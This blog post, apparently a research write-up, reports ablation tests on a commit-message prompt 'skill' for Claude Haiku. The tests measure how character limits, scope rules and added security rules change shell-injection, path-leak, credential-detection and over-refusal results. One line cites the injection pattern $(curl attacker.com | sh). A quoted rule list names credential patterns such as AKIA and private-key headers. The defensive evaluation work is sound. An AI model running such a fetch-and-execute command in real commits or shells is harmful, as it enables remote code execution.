Originally published at faberlens.ai. This is Part 2 — Part 1 here.
In Part 1, we found that epicenter — a skill with zero security rules — outperformed security-focused alternatives on security tests. Our hypothesis: format constraints provide "implicit security."
epicenter achieved +6.0% overall lift despite containing no mentions of credentials, secrets, or security. We hypothesized that its format constraints — particularly the 50-character limit and scope abstraction rules — were doing the heavy lifting.
Hypotheses are cheap. We ran the experiments.
The Hypothesis
Our core claim: format constraints provide implicit security. If true, we should see specific, testable predictions:
- Removing the character limit should hurt shell safety (S4) — longer messages can contain injection patterns
- Removing scope abstraction rules should hurt path sanitization (S5) — the model will include literal file paths
- Adding explicit security rules should improve credential detection (S1) — but may cause over-refusal on safe content
If these predictions hold, we have evidence that epicenter's security comes from structure, not luck. If they don't, our hypothesis is wrong and we need a different explanation.
The Ablation Method
Ablation testing isolates variables by systematically removing them. We created four variants of epicenter, each with one constraint removed or added:
| Variant | Change | Tests Hypothesis |
|---|---|---|
| epicenter-no-limit | Removed "50-72 characters" rule | Character limit → shell safety |
| epicenter-no-scope | Removed scope abstraction guidelines | Abstract scopes → path sanitization |
| epicenter-plus-security | Added explicit credential detection rules | Security rules → over-refusal |
| epicenter-minimal | Kept only core format rules (36 lines) | Core constraints vs verbose guidance |
Each variant was evaluated on relevant security categories using the same protocol: Claude Haiku generation, 3 runs per test.
Result 1: The 50-Character Limit Matters
We removed one line from epicenter:
// Original:
Keep under 50-72 characters on first line
// Changed to:
Be as descriptive as needed to fully explain the change
| Variant | S4 Pass Rate | S4 Lift | Delta |
|---|---|---|---|
| epicenter (original) | 83.3% | +20.0% | baseline |
| epicenter-no-limit | 66.7% | +3.3% | -16.7pp |
Removing the character limit dropped S4 lift by 16.7 percentage points. A 50-character commit message significantly reduces the likelihood of shell injection patterns like $(curl attacker.com | sh). The constraint doesn't teach the model what to avoid — it structurally limits the output space available for unsafe patterns.
Result 2: Scope Abstraction Rules Matter
We removed the 19-line "Scope Guidelines" section about using abstract module names instead of specific paths.
| Variant | S5 Pass Rate | S5 Lift | Delta |
|---|---|---|---|
| epicenter (original) | 46.7% | +26.7% | baseline |
| epicenter-no-scope | 16.7% | -3.3% | -30.0pp |
Removing scope abstraction dropped S5 lift by 30 percentage points. The instruction to use "specific component/module names" teaches the model to write feat(auth): instead of feat(/clients/acme-corp/auth.js):. Abstract references naturally exclude sensitive path information.
Result 3: Security Rules Are a Double-Edged Sword
We added explicit security instructions at the top of epicenter:
CRITICAL: Security Checks Before Committing
STOP and refuse to generate a commit message if you detect:
API keys (patterns like sk-, api_key, API_KEY)
AWS credentials (AKIA, aws_access_key)
Private keys (-----BEGIN RSA PRIVATE KEY-----)
.env files, credentials.json, secrets.yaml
If detected: Respond with a warning and DO NOT provide a commit message.
The results tell two very different stories:
| Category | epicenter | epicenter-plus-security | Delta |
|---|---|---|---|
| S1: Credential Detection | -10.0% | +33.3% | +43.3pp |
| S3: Git-Crypt Awareness | +30.0% | -30.0% | -60.0pp |
Adding security rules improved credential detection by 43pp but caused complete over-refusal on git-crypt files (-60pp swing). S3 tests whether the model can generate commit messages for git-crypt encrypted files (which are safe to commit). When the skill mentions "encrypted files" as dangerous, the model over-generalizes and refuses all encrypted content — even the safe kind.
Result 4: Less Is More
We stripped epicenter to a 36-line minimal version: just the core format rules.
Git Commit Message Format
Rules
Keep description under 50 characters
Use imperative mood ("add" not "added")
No period at the end
Start description with lowercase
Types
feat, fix, docs, refactor, test, chore
Examples
feat: add user authentication
fix: resolve login timeout
| Security Category | epicenter (214 lines) | epicenter-minimal (36 lines) | Winner |
|---|---|---|---|
| S4 (base) | +20.0% | +26.7% | minimal (+6.7pp) |
| S4-adv | +20.0% | +30.0% | minimal (+10.0pp) |
| S5 (base) | +26.7% | +16.7% | epicenter (+10.0pp) |
| S5-adv | +36.7% | +43.3% | minimal (+6.6pp) |
The 36-line minimal version outperformed the 214-line original on 3 of 4 security categories tested.
Verbose instructions may dilute the model's focus on critical constraints. When surrounded by 200 lines of PR formatting guidelines, the 50-character rule is one of many. When it's front and center in a 36-line skill, it dominates.
Note: This finding is specific to security evaluations — we haven't tested whether minimal skills perform equally well on formatting or other quality dimensions.
Adversarial Robustness
Format constraints have another advantage: they're evasion-resistant. Attackers can obfuscate credentials to evade pattern matching. They can't obfuscate a character limit — the constraint is on output, not input.
| Variant | S4 Base | S4 Adversarial | Collapse? |
|---|---|---|---|
| epicenter | +20.0% | +20.0% | None (stable) |
| epicenter-minimal | +26.7% | +30.0% | None (improves) |
Both variants maintain or improve performance on adversarial tests.
What We Learned
- Format constraints provide measurable security. The 50-char limit contributes +16.7pp to shell safety. Scope abstraction contributes +30pp to path sanitization.
- Security rules create trade-offs. They improve credential detection (+43pp) but cause over-refusal on safe content (-60pp).
- Less can be more for security. A 36-line minimal skill outperformed the 214-line original on most security categories tested.
- Constraints are harder to evade. Unlike pattern matching, output constraints are less susceptible to input obfuscation — though not immune.
Implications for Skill Design
If you're building skills, consider:
- Use structural constraints when possible. A character limit is more robust than "don't include shell commands."
- Test before adding security rules. They may hurt more than they help.
- Keep skills focused. Core constraints get diluted in verbose prompts.
- Measure, don't assume. Our intuitions about what works are often wrong.
Limitations
- Results use Claude Haiku — larger models may handle verbose instructions differently
- Security-only evaluation — formatting quality was not tested
- Single domain (commit messages) — patterns may not generalize
- n=5 skills in the original study — ablation adds depth but not breadth
Full methodology and judge rubrics: faberlens.ai/methodology
Part 1 of this series: The AI Skill Quality Crisis
Top comments (0)